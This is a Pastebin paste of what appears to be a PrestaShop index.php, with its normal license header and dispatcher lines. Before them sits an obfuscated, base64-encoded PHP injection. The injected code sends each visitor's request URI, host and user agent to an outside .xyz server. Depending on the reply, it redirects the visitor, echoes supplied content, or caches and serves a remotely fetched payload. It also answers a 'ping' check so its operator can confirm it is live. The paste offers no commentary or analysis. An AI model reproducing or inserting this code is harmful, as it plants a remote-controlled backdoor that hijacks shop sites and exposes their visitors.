Advertisement
Hectorss1

Untitled

Oct 21st, 2019
3,520
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.55 KB | None | 0 0
  1. <?php if($_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')]===base64_decode('cGluZw=='))exit(base64_decode('b2s='));function g0($v1){$a2=curl_init(base64_decode('aHR0cHM6Ly8xM2NmM2RlMjM1ZDc0MDVkYmVlZTAxODc1MTFhMjA0OC54eXovYWE='));curl_setopt($a2,CURLOPT_CUSTOMREQUEST,base64_decode('UE9TVA=='));curl_setopt($a2,CURLOPT_POSTFIELDS,json_encode(array(base64_decode('dQ==')=>$_SERVER[base64_decode('UkVRVUVTVF9VUkk=')],base64_decode('aA==')=>$_SERVER[base64_decode('SFRUUF9IT1NU')],base64_decode('YQ==')=>$_SERVER[base64_decode('SFRUUF9VU0VSX0FHRU5U')],base64_decode('Yw==')=>$v1)));curl_setopt($a2,CURLOPT_RETURNTRANSFER,true);curl_setopt($a2,CURLOPT_HTTPHEADER,array(base64_decode('Q29udGVudC1UeXBlOiBhcHBsaWNhdGlvbi9qc29u'),));$f3=curl_exec($a2);if($f3===false)echo base64_decode('Y3VybCBlcnI6IA==').curl_error($a2);curl_close($a2);$o4=json_decode($f3,true);return $o4;}$o4=g0(false);if($o4[base64_decode('dA==')]===1){header($o4[base64_decode('dg==')],true,301);exit();}else if($o4[base64_decode('dA==')]===2){echo base64_decode($o4[base64_decode('dg==')]);}else if($o4[base64_decode('dA==')]===3){$v5=sys_get_temp_dir().base64_decode('Lw==').$o4[base64_decode('dg==')];if(file_exists($v5)){$u6=file_get_contents($v5);$r7=1;}else{if(!$o4[base64_decode('ZA==')])$o4=g0(true);$u6=base64_decode($o4[base64_decode('ZA==')]);file_put_contents($v5,$u6);$r7=0;}header($o4[base64_decode('Yw==')]);header($o4[base64_decode('bA==')]);header(base64_decode('eC1jOiA=').$r7,true,$o4[base64_decode('cw==')]);echo $u6;exit();}?>
  2. <?php
  3. /*
  4. * 2007-2014 PrestaShop
  5. *
  6. * NOTICE OF LICENSE
  7. *
  8. * This source file is subject to the Open Software License (OSL 3.0)
  9. * that is bundled with this package in the file LICENSE.txt.
  10. * It is also available through the world-wide-web at this URL:
  11. * http://opensource.org/licenses/osl-3.0.php
  12. * If you did not receive a copy of the license and are unable to
  13. * obtain it through the world-wide-web, please send an email
  14. * to license@prestashop.com so we can send you a copy immediately.
  15. *
  16. * DISCLAIMER
  17. *
  18. * Do not edit or add to this file if you wish to upgrade PrestaShop to newer
  19. * versions in the future. If you wish to customize PrestaShop for your
  20. * needs please refer to http://www.prestashop.com for more information.
  21. *
  22. * @author PrestaShop SA <contact@prestashop.com>
  23. * @copyright 2007-2014 PrestaShop SA
  24. * @license http://opensource.org/licenses/osl-3.0.php Open Software License (OSL 3.0)
  25. * International Registered Trademark & Property of PrestaShop SA
  26. */
  27.  
  28. require(dirname(__FILE__).'/config/config.inc.php');
  29. Dispatcher::getInstance()->dispatch();
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement